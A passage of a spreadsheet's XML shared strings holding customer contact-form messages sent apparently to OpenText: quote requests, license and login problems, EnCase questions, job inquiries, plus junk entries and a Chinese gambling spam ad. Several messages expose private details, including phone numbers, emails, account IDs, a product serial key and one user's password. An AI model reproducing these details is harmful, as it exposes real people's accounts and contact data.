Dans ce cadre, nous avons besoin que tu puisses nous fournir les catalogues de prix publics (en format XL) ainsi que les remises accordées à COMPAREX par gamme de produit ._x000D_
Merci de me faire parvenir vos réponses pour le 4 janvier au plus tard._x000D_
Je reste à votre disposition pour tout complément d’information. _x000D_
_x000D_
Cordialement,_x000D_
_x000D_
François</t>
  </si>
  <si>
    <t>Job requirements</t>
  </si>
  <si>
    <t>Dear Sir,_x000D_
our client national carrier of Sri-Lanka called bids for procurement of a performance based on line Marketing solutions.If you interest for above please contact me as soon as possible._x000D_
Thanks &amp; Regards,_x000D_
Veyara Raulf</t>
  </si>
  <si>
    <t xml:space="preserve">World Biochem 2019  is very glad to invite proficient delegates, scientists, professors, students, young researchers, business executives, scholars, chemists and professionals across the globe to be a part of World Congress on Biochemistry and Enzymology at Amsterdam ,Netherlands in month of March 25,26 2019. Keynote speech, exhibitions, oral and poster presentations outline the key attractions of the conference on the theme "Delve into the chemical concepts of biology”._x000D_
World Congress on Biochemistry and Enzymology_x000D_
+448000868979_x000D_
</t>
  </si>
  <si>
    <t>Givkbkbk</t>
  </si>
  <si>
    <t>Hello, Can we please cancel the service contract for the provision of Fax to Mail services your customer number 853166 for Caramba Holding GMbH, Bernerstrasse 6, Kunzelsau, Germany 74653.  The contract was originally agreed with Premier Global Services .  Please cancel with immediate effect. Thanks</t>
  </si>
  <si>
    <t>Request to provide an API documentation for OpenText Content Server 16.x API for uploading documents to OpenText.. We're looking to integrate one of the customer's systems with OpenText and require its API documentation for uploading documents.</t>
  </si>
  <si>
    <t>We are looking to replace our digital media library and would like to send you an RFT. Please provide contact details for the best team or person to submit this to by 3rd January 2019</t>
  </si>
  <si>
    <t>Hello,_x000D_
I am not able to find Release notes for Documentum-16.5. Could you please provide me link._x000D_
Also, is Azure blob storage is supported by Documentum 16.5?_x000D_
_x000D_
Regards,_x000D_
Sumit</t>
  </si>
  <si>
    <t xml:space="preserve">Please quote a price for_x000D_
1.	OpenText Exceed 15 (QTY:1)_x000D_
2.	OpenText Business Center Capture 16.3.28_x000D_
</t>
  </si>
  <si>
    <t>why am I being getting a charge on my Costco statements?</t>
  </si>
  <si>
    <t>I need to know how is your partner in KSA To working with him for opportunity.</t>
  </si>
  <si>
    <t>Want a E-mail service through which I can run my campaigns and I find you the best in this case who can helpo me.</t>
  </si>
  <si>
    <t>I want u</t>
  </si>
  <si>
    <t>Sjdjdjf</t>
  </si>
  <si>
    <t>Job offer</t>
  </si>
  <si>
    <t>--</t>
  </si>
  <si>
    <t xml:space="preserve">Because I don't remember my pass word </t>
  </si>
  <si>
    <t>I looking forward to my application for a job</t>
  </si>
  <si>
    <t>Learn from each other</t>
  </si>
  <si>
    <t xml:space="preserve">we have centura version 2.1 and want to buy version 6.3 </t>
  </si>
  <si>
    <t>首席阿里巴巴zzzzzzzzzz</t>
  </si>
  <si>
    <t>Unsubscribe asap</t>
  </si>
  <si>
    <t>We recently acquired a used Open Text A102 Fax Appliance.  The Serial Number is DT1697850.  The unit works, but on the outgoing faxes, there is a watermark that says To License, please contact:  imgmaker.  Is there a way this unit can be licensed and put on a support contract?</t>
  </si>
  <si>
    <t xml:space="preserve">You have a picture of Oligoporus mappus in your site. I don't know the photographe. I would like to take it for a paper in our sit on new Postia genera. May I do this, please ? You will se the paper on our site Mycoquébec. Merci et amitiés ! Roland_x000D_
</t>
  </si>
  <si>
    <t>We purchased Global360 a few years ago.  The computer where it was installed was replaced and we require a new registration code.  The old one no longer works._x000D_
Serial # QGER8-7NW34-6Q2ZZ-U2TJ3-6KDMV</t>
  </si>
  <si>
    <t xml:space="preserve">I need to purchase 6 copies of Redact-It for our Police Records department. </t>
  </si>
  <si>
    <t>hi I wanted to see if there are any discount that I could receive on my services. please contact me at 6024421144</t>
  </si>
  <si>
    <t>We have been using the product called "Xpresson" to create contracts such as booklets. We would like to know more information.</t>
  </si>
  <si>
    <t>Hi, _x000D_
This is my second attempt to get a quote for the below, the customer will be CA Dept. of Fish and Wildlife:_x000D_
_x000D_
1 - EnCase Forensic 8_x000D_
_x000D_
1 - Tableau Forensic Universal Bridge (Model: T356789iu)</t>
  </si>
  <si>
    <t>GSX catalog password reset.  We  have attempted resetting our password, however, the temp passwords are failing as well.  Any help would be greatly appreciated.</t>
  </si>
  <si>
    <t>I am trying to obtain invoicing for account # 756341 that is charged monthly to our AMEX card in the amount of 15.03.  Lisa Hirmon was on the account &amp; is no longer with us.  Can you please forward these invoices to accountspayable@leadingresource.com</t>
  </si>
  <si>
    <t xml:space="preserve">I need a carbon copy set up for inbound 852 data from Von Maur </t>
  </si>
  <si>
    <t>Dear Sirs, _x000D_
we are interested in your program "Brava for sharepoint"._x000D_
please contact us:  +51 1 997572043_x000D_
Thank you in advance_x000D_
Regards</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for job. </t>
  </si>
  <si>
    <t>Did you receive my application</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings to you,_x000D_
_x000D_
Happy Holidays! My name is Mia with the company Healthier 4 U Vending. I have a client in your area interested in placing their healthy vending machine in your location. The machine is filled with healthy snacks and drinks.  We take care of all the details and it is of no cost or maintenance to you._x000D_
_x000D_
_x000D_
Please contact me if you are receptive to this service._x000D_
_x000D_
_x000D_
Thank you,_x000D_
Mia_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>buenas tardes tengo aplicaciones en team developer 2.0 como puedo migrar a las nuevas versiones de team developer y si hay que pasar a versiones intermedias como lo puedo hacer y a que versiones seria._x000D_
tienen algún contacto en mexico cuales serian los datos para poderlo contactar??</t>
  </si>
  <si>
    <t xml:space="preserve">My name is Tifani and I work for Creative Services, Inc., a background investigation company in Massachusetts and South Carolina. I need to verify employment for a former Recommind employee: Nicholas Russo.  Please provide all/any of the following information. If you cannot provide this information, please direct me to the correct person or department._x000D_
Dates of Employment:_x000D_
Title:_x000D_
Reason for leaving:_x000D_
Eligibility for rehire:_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">customer id: 7583_x000D_
PSN no 611002352_x000D_
_x000D_
my portal account (sharon.lin@trapac.com) is not working._x000D_
and i am having problem of setting up a new event. _x000D_
_x000D_
please help me with the above two problems._x000D_
_x000D_
thank you_x000D_
sharon </t>
  </si>
  <si>
    <t xml:space="preserve">Please provide information on DuPage County RF SUID 2294-12123. I do have a communication from Open Text regarding this specific RF  SUID dating back a few years.. I look forward to a response to my inquiry, Happy New Year. </t>
  </si>
  <si>
    <t>I want to know if EnCase can analyze an E01 that was made of a McAfee FDE drive, if I have the XML with the machine key. If so I want to buy EnCase.</t>
  </si>
  <si>
    <t xml:space="preserve"> i am intersting work canada </t>
  </si>
  <si>
    <t>To upgrade my life and New generation for skills development</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We have a client who will be acquiring some documentation from a seller than currently uses Documentum for their data storage. We are looking to set up the client with their own Documentum account to be able to migrate the data easily from the seller to themselves. Would you be able to provide a quote for the service and details of the data migration process?_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Katie Botti</t>
  </si>
  <si>
    <t>I work for Microsoft. We had been using Documentum 6.7 and previous versions in the past. _x000D_
_x000D_
Now, I need a license for Documentum 16.4 release. I am not sure if OpenText has inherited license agreement that Microsoft had with EMC or not. If not, please let know how to get one including cost details._x000D_
_x000D_
Unfortunately, I don’t have any information about past license agreement.</t>
  </si>
  <si>
    <t>Faço parte da Diretoria de Processos Seletivos da Universidade Federal de Uberlândia - UFU. Temos a licença do Cardiff Teleform 10.4.1 (10460) 12/11/2009 contendo 1 licença das aplicações gerais (Reader + Designer + Auto Merge Publisher + Database Utilities + Control Center + Monitor) e 3 licenças do Verifier. Precisamos atualizar o sistema para uma versão mais atualizada e portanto necessito de uma proposta desta atualização. Aguardo retorno urgente.</t>
  </si>
  <si>
    <t>any job in network engineer in your company</t>
  </si>
  <si>
    <t>Dear Open Text Customer Support,_x000D_
_x000D_
Please help about the HPX Command Center - Delivery Engine problem. Let me give a brief explanation about the problem._x000D_
_x000D_
Currently we have several jobs running on the Command Center (Batch job and Immediate Letters) that are sending emails to the customer. But, here comes the problem, whenever the batch job is already in running state (sending Email), all the email messages are being pooled in the activeMQ queue to be processed by Delivery Engine. _x000D_
After that, comes the jobs for immediate letter. Suddenly all the immediate jobs are in waiting "sending email delivery" status, waiting for the batch job queue to finish delivering Emails._x000D_
This are unacceptable by the business flow, because all the immediate letter should be process first before any batch job, even though the batch job are already in sending emails. _x000D_
_x000D_
Is there any suggestion for us to re-config or change the status in order to make the immediate letter queue running first before the batch job finish?_x000D_
_x000D_
Thank You for the help.</t>
  </si>
  <si>
    <t>Hello,_x000D_
We are using Open Text Fax solution from 2 years. _x000D_
But when we try to install our solution another server for the user - password problem, to noticed we have not activation key. We contacted with Ebi Soft from Turkey. They said us "you have no activation key" and they said "just, we can activate your fax solution". But we have bill for the buy. So we gave him some money for the installation and he activate our solution._x000D_
_x000D_
So have can we get our activation key?_x000D_
_x000D_
Thank you,_x000D_
Regards.</t>
  </si>
  <si>
    <t>Archibald Ave Rancho Cucamonga</t>
  </si>
  <si>
    <t>Jshhz</t>
  </si>
  <si>
    <t>Onshsb</t>
  </si>
  <si>
    <t>Pricing on OpenText Cloud Fax.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Dear Human Resources Department,_x000D_
_x000D_
Thank you very much for your time reading this message._x000D_
_x000D_
My name is Masakazu Nakamura, from a project manager of sales planning department at Tri-Arrow Co., Ltd. from Japan._x000D_
I am writing this e-mail to ask permission to make an appointment with you in Tokyo, Japan._x000D_
_x000D_
We are a staffing / employment  agency and software development.  We especially have experience in staffing agency for engineers more than 40 years._x000D_
We are able to dispatch English-speaker engineers to companies in Japan as a staffing / employment  agency._x000D_
Further, we have software development bases for Hanoi in Vietnam, Hokkaido and Sendai in Japan as offshore and near-shore software development center._x000D_
_x000D_
I would like to make an appointment with you to give a presentation about our services._x000D_
Would you please tell us whether you can accept our request and give us your cooperation or not? _x000D_
_x000D_
For further information, feel free to ask me._x000D_
I look forward to hearing your reply._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Masakazu Nakamura_x000D_
Tri-Arrow Co., Ltd._x000D_
----------------------------------------------------------------------_x000D_
 Masakazu Nakamura_x000D_
 Project Manager, Tri-Arrow Co., Ltd._x000D_
 5-29-19, Shiba, Minatou-ku, Tokyo Japan_x000D_
 Tel:+81-3-5439-1200, Mobile:+81-80-3305-3970_x000D_
-----------------------------------------------------------------------_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I would like more information on the course work and how much the cost is to take each course. _x000D_
I am working fulltime but my spouse is a patient, and unable to fully work. So I am looking for assistance, if available. Please advise. </t>
  </si>
  <si>
    <t>Necesito que nos pongamos en contacto para ver que servicios tienen disponibles._x000D_
_x000D_
y por otra parte, cual es el partner en Chile ?</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
_x000D_
My account don't have proper access to download software. Can you please check._x000D_
Account: sarvo.morram@servicenow.com_x000D_
_x000D_
Thanks,_x000D_
Sarvo Morram</t>
  </si>
  <si>
    <t>Can you submit a demo electronic license for Encase Forensic software ?</t>
  </si>
  <si>
    <t>OpenText is currently our VAN for EDI and we are using the Desktop EDI product Version 3 4 5 8.  Please direct me to/provide information on the alternatives you offer to the Desktop EDI product as we wish to transition off the XP based Desktop EDI.  We are generating our own EDI documents and have no interest in web forms. We are interested in a product that provides validation and scheduling features similar to those provided in Desktop EDI._x000D_
Thank you,_x000D_
Michelle Cox</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in potentially OEMing OT solutions (e.g. an agent to collect data from end-point devices). Please reach out. </t>
  </si>
  <si>
    <t>I am new to the SOC team here at AAA. Need to have my account linked to the enterprise account to support our Encase implementation.</t>
  </si>
  <si>
    <t>We have 400k contacts and send about 7 emails per month. We would like to know how much is it for Vignette Messenger for our agency. Thank you</t>
  </si>
  <si>
    <t>reinstalling to a new computer and cannot get the log in screen</t>
  </si>
  <si>
    <t>I don't know</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for information for the following courses, but can not seem to find any information on schedules/availability/pricing.  We had a couple of people in our organization take the Introduction to Design and production via online delivery earlier in 2018,  but as the new training coordinator I can not find information on it or any information on online delivery on your website. The courses I am looking for are as follows:_x000D_
_x000D_
OpenText Exstream - Introduction to Design and Production _x000D_
OpenText Exstream - Designing Statements _x000D_
OpenText Exstream - Integrating Variable Data _x000D_
OpenText Exstream - High Volume Delivery _x000D_
_x000D_
Thank you for your assistance_x000D_
</t>
  </si>
  <si>
    <t>Our company would like to be a distributor of Opentext, for which we want to know what we need to be able to count on your assistance.</t>
  </si>
  <si>
    <t xml:space="preserve">ich bin ein star </t>
  </si>
  <si>
    <t>I have not been able to use EnCase for a while because my dept was reorged and my position was moved to another country. I certified with EnCase v7. I want to take a training course to maintain my certification because I am hoping to get another position in forensics. Which course would be the best fit now that EnCase is v8? I want to sign up for an in person class in Virginia. Thank you.</t>
  </si>
  <si>
    <t>my log in credential is not working. _x000D_
tried to re-set password, and it gave me:_x000D_
"The email address you entered is not registered with OpenText Connect. Please try again or cancel." _x000D_
please help._x000D_
thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">I am not able to access the OpenText Active Catalogue. My network ID is R4034 and user ID is R4034E. I have requested several times to reset my password, but I have never received the email to reset it. </t>
  </si>
  <si>
    <t xml:space="preserve">I have OpenText Socks Client 14 x64 installed on a Windows 10 Enterprise Edition VM running  version10.0.17134 N/A Build 17134.  My connections are not socksifying, and I'm certain I'm using a configuration file that is working for my coworkers, but I am the first to install on a Windows 10 workstation/VM.  Is there any quick-help or known issues you can share to assist me, please?  </t>
  </si>
  <si>
    <t>Need to purchase additional fax number.  We have an account already, #861388.</t>
  </si>
  <si>
    <t>I'm going the normal chain here to try to get a question answered I've asked a month ago.  Going straight to the source.  My referral team uses RightFax all the time.  All incoming to a specific # go to an incoming folder.  To preserve that original image, there is a rule to FAX that incoming message which goes to another folder.  That seems odd since we can FORWARD messages.  The problem is when we Forward a message it creates a Duplicate which for some reason any changes made to that Duplicate (e.g. add a text box), when saved, saves those changes to the original image.  That seems like odd functionality.  So my question is, is that a setting when forwarding make a duplicate that is still linked to the original image?  Can that be turned off to where when an image is forwarded it breaks the link with the original image?_x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">We would like to test a new server using FoIP so we are requesting a trial key for that. Can you provide me one?  </t>
  </si>
  <si>
    <t>Currently using fax2mail service but am getting submission rejections for every fax that I try to send. Says "You need to be authorized to use this service. Authentication failed."</t>
  </si>
  <si>
    <t>To help me invest the business of my dreams to create jobs for Africans</t>
  </si>
  <si>
    <t>My client is trying to decommission a server and is wondering how much it would cost to purchase OpenText eDOCS DM licenses for all of his users.</t>
  </si>
  <si>
    <t>Looking into BI and softwares to help manage large data sets.</t>
  </si>
  <si>
    <t>company is Weissman Law, the Right Fax is not compatible with Office 2016, do you have a client that will be compatible with office 2016,  our fax server is currently version 10.6</t>
  </si>
  <si>
    <t>I am currently running Imagenation 8.3 serial number 1171-7542-0002.  I would like to know what option I have to upgrade my existing licenses to the latest version, and also get a quote for adding additional license.</t>
  </si>
  <si>
    <t>Silicon Valley Bank uses OpenText as a vendor. Currently we are running a vendor risk assessment and need an OpenText sales contact to request security documents. Thank you.</t>
  </si>
  <si>
    <t>Hi, I work for Ireland's National Cyber Security Centre and I would like to speak to a relevant person in Open Text about the Network and Information Systems Directive. Can a relevant employee contact me via my e-mail about this please?._x000D_
Kind regards,_x000D_
Ruaidhri Fernandes</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
Flick Gocke Schaumburg ist eine Partnerschaft von Rechtsanwälten, Wirtschaftsprüfern und Steuerberatern. Wir  möchten uns einen Überblick über die von Ihnen angebotenen Produkte für unsere Branche verschaffen._x000D_
_x000D_
Insbesondere würden wir gerne näher erfahren, wie sich die von den NRW-Gerichten genutzte "eAkten"-Lösung ggf. auch in einer Kanzlei einsetzen lässt._x000D_
_x000D_
Zur Erörterung dieser Fragestellungen bitte ich um Kontaktaufnahme durch einen Ansprechpartner in Ihrem Unternehmen._x000D_
_x000D_
Mit freundlichen Grüßen,_x000D_
Ulrich Krause</t>
  </si>
  <si>
    <t>I would like to obtain a quote on your fax2mail cloud service</t>
  </si>
  <si>
    <t>Hello</t>
  </si>
  <si>
    <t>To arange a loan contract</t>
  </si>
  <si>
    <t>Hello,_x000D_
Merry Christmas and a Very Happy New Year to you...!!!_x000D_
_x000D_
I wish you a wonderful new year filled with abundance, joy, and treasured moments. May 2019 be your best year yet!_x000D_
_x000D_
Let this New Year bring out new ventures of success for your life and develop your ideas into reality._x000D_
_x000D_
I would be so glad to have you as a potential client coming years and look forward to serving you in the future._x000D_
_x000D_
Let's keep that tradition going in the upcoming year._x000D_
_x000D_
Best Wishes,_x000D_
Aneri</t>
  </si>
  <si>
    <t>First page rankings on Google_x000D_
_x000D_
We can put your website on 1st page of Google to drive relevant traffic to your site. Let us know if you would be interested in getting detailed proposal. We can also schedule a call &amp; will be pleased to explain our services in detail. We look forward to hearing from you soon. (GUARANTEED RESULTS) Thanks!</t>
  </si>
  <si>
    <t>Good morning, sir,_x000D_
_x000D_
My name is Juan De Oliveira and I work in the Technology department of Jaggaer._x000D_
_x000D_
At the moment we have a client with a specific need that we are trying to cover and we need to know if you can help us._x000D_
_x000D_
Basically we have a client with a series of contracts in paper and PDF that needs to load them into our JaggaerAdvantage purchasing platform, specifically in the contracts module. What we need is an agile tool that allows us to make this load from the physical or electronic support and record the information on the platform._x000D_
_x000D_
If you think you can help us please contact me._x000D_
_x000D_
Thank you!</t>
  </si>
  <si>
    <t>Dear Team,_x000D_
 We were partners with the EMC for the Documentum support &amp; we were supporting client for the Documentum webtop based application. Now we have to give support &amp; maintenance for the same application we used to maintain like we have to upgrade the Documentum application to the latest patches/versions. But now we don't have any resources access of the Documentum not even patches or there patch notes. As we only need the Documentum resources for the Development &amp; maintenance to the client, Please let me know what we have to do to get developer access to the Documentum resources</t>
  </si>
  <si>
    <t>To Mimic the access Of Satish Thonupunuri</t>
  </si>
  <si>
    <t>RE</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
Does your product do one or all of followings:_x000D_
_x000D_
	Encrypt .txt file or Folder containing .txt files_x000D_
	Set Expiry date; i.e. file or folder cannot be  accessed or auto delete after certain date_x000D_
	Set authorized user/s to access this file/folder_x000D_
_x000D_
Your prompt response is highly appreciated_x000D_
</t>
  </si>
  <si>
    <t>I would like to understand more about OpenText solutions for process automation. Please let me know who to talk to. Thanks.</t>
  </si>
  <si>
    <t>Bonjour _x000D_
Je me présente tout d’abord, NCHOUBI responsable de formation chez GENIUS IT Casablanca/Maroc._x000D_
Nous avons planifié une formation sous thème : LivelinK  – K2, au Mois de février  et nous souhaitons savoir si nous pouvons collaborer à ce sujet _x000D_
Merci de bien vouloir nous envoyer votre offre :_x000D_
•	Programme_x000D_
•	CV de votre formateur_x000D_
•	Proposition commerciale_x000D_
Je reste à votre disposition pour tout complément d’information._x000D_
_x000D_
Cordialement_x000D_
Nchoubi</t>
  </si>
  <si>
    <t>Messages and text</t>
  </si>
  <si>
    <t>iasjj999</t>
  </si>
  <si>
    <t>★注冊鎹埰唫高至88え,满百可提，免打流水~!_x000D_
官网【 www。qhc884。com 】官网2【 www。qhc377。com 】_x000D_
【十大老虎机，Ag真 人，捕鱼，棋牌，彩 票，体育】_x000D_
◆每周AG真人洊宋30%，佬虎击每周存宋80%_x000D_
超滈返水无上限1.2%,无需蓅水，實力，信謍，大额嘸忧秒菿账.</t>
  </si>
  <si>
    <t>Bb</t>
  </si>
  <si>
    <t>Need to download 8.07 version encase examiner, Very Urgent!</t>
  </si>
  <si>
    <t>Nothing</t>
  </si>
  <si>
    <t>Want to upgrade your EnCase from Version 8.04 to 8.07</t>
  </si>
  <si>
    <t>God</t>
  </si>
  <si>
    <t>Jice</t>
  </si>
  <si>
    <t>fasf</t>
  </si>
  <si>
    <t xml:space="preserve">We require following details in Digital Rights Management for Pen Drive for one of our client: Please check if your product fulfills the same &amp; sahre the products details &amp; commercial_x000D_
_x000D_
1. Data in Pen Drive will become write and copy protected._x000D_
2. Data will be automatically deleted after given time._x000D_
3. The process does not require extra effort &amp; time for creation._x000D_
4. PEN DRIVE will be restricted to be used on one PC_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">God_x000D_
</t>
  </si>
  <si>
    <t>good,work</t>
  </si>
  <si>
    <t>We are trying to find out information about our current support contract and also set up support accounts for issue reporting.</t>
  </si>
  <si>
    <t xml:space="preserve">I am the lawyer-founder of BlockDrop, an ecosystem designed for lawyers to access legal reference materials and news for the blockchain space. I would love to connect with your team on some synergies for 2019! We service AmLaw100s, corporate in-house departments and small to mid-sized law firms. </t>
  </si>
  <si>
    <t>Question about our annual maintenance renewal. Preparing budget for next fiscal year and was inquiring as to whether there will be an increase.</t>
  </si>
  <si>
    <t>Am looking for ajob</t>
  </si>
  <si>
    <t>I downloaded FREE DWG VIEWER from Softronic.  When I try to load a drawing, I get an INVALID LICENSE message and directions to your website._x000D_
Please help  ThosMason@yahoo.com</t>
  </si>
  <si>
    <t xml:space="preserve">Because of i need a job </t>
  </si>
  <si>
    <t>Hi,_x000D_
   Please let me know the end of support date for Opentext 16.5. Also let us know the latest available version that we can upgrade to. We are working on out 3 year roadmap and need this information for planning._x000D_
_x000D_
Thanks,_x000D_
Sami</t>
  </si>
  <si>
    <t>Receiving and error when trying to open a pdf with the IRM plugin. _x000D_
There was an error opening this document. Bad parameter. _x000D_
Using Adobe Acrobat Reader DC ver. 19.010.20064</t>
  </si>
  <si>
    <t>Hi, i have problem with user and password. For my account_x000D_
EXCLUSIVE BRANDS INTL SA (125073017656)_x000D_
_x000D_
NetworkID:  EX76897_x000D_
User ID:       EX76897D_x000D_
_x000D_
If possible review it. My old password was magicone35, if possible resent or reset password. I believe that process to recover password sent link to my boss or old email, maybe fmaduro@tcarrier.net or gilberto.tunon@tcarrier.net, but it old email was used and right now were disable.</t>
  </si>
  <si>
    <t>Cacapipipopo</t>
  </si>
  <si>
    <t>How can I have right fax use single sign in?</t>
  </si>
  <si>
    <t>Register of imaging software</t>
  </si>
  <si>
    <t>Helping street kids and abandoned childrens</t>
  </si>
  <si>
    <t>Conocer que servicios poseen.</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to find an address to send payment for 2 online courses that one of my coworkers is taking.  The courses are 3-0191 Content Server System Administration I v16.2 (5 days) and 3-0192 Content Server System Administration II v16.2 (2 days).  Thank you.  _x000D_
 </t>
  </si>
  <si>
    <t>I am interested in moving our on premise solution to a cloud or managed solution.</t>
  </si>
  <si>
    <t>Samiha</t>
  </si>
  <si>
    <t>Yassir</t>
  </si>
  <si>
    <t>The site keeps sending me to confirm registration every time I come back to the site or try to visit My Support.  I need to get a download link for the latest EnCase 8.08 but I cant find the Download Center and when I log in and try to access My Support, the site says I don't have access to it and I need to confirm registration to get access, which makes me sign in and I still don't have access.  Is there an easier way to get the EnCase 8.08?</t>
  </si>
  <si>
    <t>I was not able to logon and have reset the password but the page does not provide any error messages it just clears the password.  Is there an issue?</t>
  </si>
  <si>
    <t xml:space="preserve">Just to make a follow up </t>
  </si>
  <si>
    <t>Can't pay my bill. Keep getting Application error that says to contact the system administrator.</t>
  </si>
  <si>
    <t>I would like to know if there is an agreement or contract for Open Text services for account 1808765960. If you provide an email address I will send the Letter of Authorization and Letter of Transfer for Crystal Rock Water to DS Services of America, Inc.</t>
  </si>
  <si>
    <t>Interested to new work opportunities.</t>
  </si>
  <si>
    <t>We have a fax2mail account.  We use to log in at fax@rikkidavis.com, then we changed it to management@churchillyachts.com.  Now we cannot get logged in, but you continue to charge our credit card.</t>
  </si>
  <si>
    <t>Haven't access to MySupport page. When I click to MySupport page I get message: "No Access"</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Je suis data scientist travaillant sur un sujet de text mining, j'aimerai échanger avec vous sur votre solution d'analyse de données textuelles (Open Text) pour avoir plus de détails techniques et savoir si votre outil pourrait répondre à nos besoins. Merci</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sales support, _x000D_
_x000D_
We are looking to implement an enterprise content management solution and OpenText reached our attention.  _x000D_
_x000D_
For us to proceed with the analysis can we please arrange an online meeting, so we can do some quick questions? Or inform us of an email account so we can send them._x000D_
_x000D_
Thank you_x000D_
</t>
  </si>
  <si>
    <t>Good day! My name is Elena, I am a representative of the ITPS Group. A branch of our company in UAE is preparing to take part in a tender for LME, and it is necessary to send a MAF in tender documentation. Is it possible to discuss this question with you and to receive such a letter for this very tender? Thank you. With regards, Elena Bazhina</t>
  </si>
  <si>
    <t>The partner of Opentext in Israel, who is the sole reseller and in-charge of the support for OpenText products has changed. This news came to us only after the change occurred. We would like an offer from OpenText for supplying support services and to purchase products directly from OpenText. This is the first time that we approached you in this matter, last claim was ignored. Please respond as soon as possible.</t>
  </si>
  <si>
    <t>Users are facing issues in opening certain files in Documentum.</t>
  </si>
  <si>
    <t xml:space="preserve">Nice </t>
  </si>
  <si>
    <t>There is an RFP from Saudi Electric in Saudi Arabia for annual maintenance and technical support. Kindly let us know if you have any recommended partner already working on it or will there be same price given to all vandors?</t>
  </si>
  <si>
    <t>I would like to know the cost of Documentum training class for support engineer.</t>
  </si>
  <si>
    <t xml:space="preserve">Good_x000D_
</t>
  </si>
  <si>
    <t>TG</t>
  </si>
  <si>
    <t xml:space="preserve">I can not log in to my ANX. PIN is wrong. </t>
  </si>
  <si>
    <t>Hello Can jou gif my the havoc skin from Fortnite.</t>
  </si>
  <si>
    <t>Hi Team_x000D_
I am not able to access the My Support page despite confirming the mail based confirmation link multiple times.</t>
  </si>
  <si>
    <t>hello si</t>
  </si>
  <si>
    <t xml:space="preserve">I am currently the Cyber Security Director for NAVFAC Far East. I am looking to move into the Digital Forensics field with NCIS. I need to know if each of your on demand classes end with a certification exam? Also I am trying to be EnCase Certified what programs are needed? In addition, would I get the same content out of the online classes as the in house classes. Any information you provide would be helpful. Thank you. </t>
  </si>
  <si>
    <t>Mzi 0725400522</t>
  </si>
  <si>
    <t>Hh</t>
  </si>
  <si>
    <t>good</t>
  </si>
  <si>
    <t>I used Hightail and now it has been purchased by Opentext. What happened to the convenient icon on my banner?</t>
  </si>
  <si>
    <t>i am a information technology student at trios college, i am very interested to do my internship in OPEN TEXT corporation as the company is technology based. your assistance in my internship placement research is highly appreciated._x000D_
_x000D_
thank you.</t>
  </si>
  <si>
    <t>Samaritan House would love to sit down and tell you about our our organization that is serving over 14,000 low-income clients living in San Mateo County and how Open Text can partner with us to help continue to provide hope to our clients</t>
  </si>
  <si>
    <t xml:space="preserve">I wanna upgrade EnCase to version 8.08 but I can´t find the installer, where  can I download it ?. _x000D_
I have EnCase v8.05 _x000D_
</t>
  </si>
  <si>
    <t>I represent the Technology Sourcing function in Accenture. Accenture needs to procure a Content Management solution for provision of services to one of our clients based in the United States. Your company has been identified as a potential supplier and we would like to invite your company to participate in a Request for Quote (RFQ) process to be conducted in January 2019. _x000D_
_x000D_
The requirement is quite urgent and during January we plan to conduct the RFQ process followed by product demonstrations, leading to down-selecting of a suitable supplier by the end of January following which we will negotiate a vendor contract. _x000D_
_x000D_
If your company wishes to participate in this RFQ process, please respond to me with the name and email ID of the contact person with whom I can commence communication in this regard. _x000D_
_x000D_
Thanks._x000D_
Jitendra (Jay) Lokre_x000D_
Procurement Plus | Technology Sourcing Associate Manager | Accenture, Toronto, ON, Canada_x000D_
Phone: (416) 641-3507; jitendra.lokre@accenture.com</t>
  </si>
  <si>
    <t>I have been trying to apply for the position of VP Data Privacy and Compliance, but am having technical difficulties and would like to confirm that I have successfully submitted my application.  I have tried re-registering but am told an account for my email exists.  I have tried requesting a new password, but have not received a link.  I have also not received an automated message confirming receipt of my application.  Thank you in advance for any assistance.  I am very interested in this role.</t>
  </si>
  <si>
    <t xml:space="preserve">Passport assistance. My company recently purchased the "On Demand Annual Training Passport" for for the account associated with this email address. I am just having difficulty figure out how to sign up for classes. I wanted to start with 	"DF120 - Foundations in Digital Forensics with EnCase® OnDemand" 32 Hours. I'm hesitant to select it._x000D_
_x000D_
To use my passport do I just select my passport as the payment method, and my currency type? No one explained to my house this would work, and I would hate to use it improperly. _x000D_
</t>
  </si>
  <si>
    <t>Loss of access to Actuate system by all users in CAPITA. Server WMACT1WEB01</t>
  </si>
  <si>
    <t>Trying to go to the encase links on your website gives me certificate errors.  I have some tableau devices that I want to check the firmware on.</t>
  </si>
  <si>
    <t xml:space="preserve">I need access to the account information to pay my bill.  Every time I try, it tells me I haven't confirmed my email address but I have tried that repeatedly.  </t>
  </si>
  <si>
    <t xml:space="preserve">I need help from you or an integrator with an issue we are having between Rightfax and Cisco Call Manager. We are looking for someone who can look at our whole setup and help us fix it properly so it is working. </t>
  </si>
  <si>
    <t>Hi_x000D_
_x000D_
I requested a quotation last week, we would like to implement a Documentation Management System at Laboratorios Silanes, one of the major pharmaceutical company in Mexico. For now I just need the cost to implement a validated DMS and the cost per type oif user, as well as a comparison against other DMS in the market._x000D_
_x000D_
Thank you_x000D_
Luis Aranda</t>
  </si>
  <si>
    <t xml:space="preserve">We currently have Alchemy version 9.0 (Build 100.102) and I would like to know if it is compatible with Windows 10 64 bit. </t>
  </si>
  <si>
    <t>I have downloaded the Brava Desktop app but i am not able to download the evaluation license.Please advise?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
We are in the process of upgrading from SharePoint 2010 to SharePoint 2016._x000D_
We currently use your Brava product and are considering upgrading it along with SharePoint._x000D_
Can you please advise what the recommended upgrade path is?_x000D_
_x000D_
regards,_x000D_
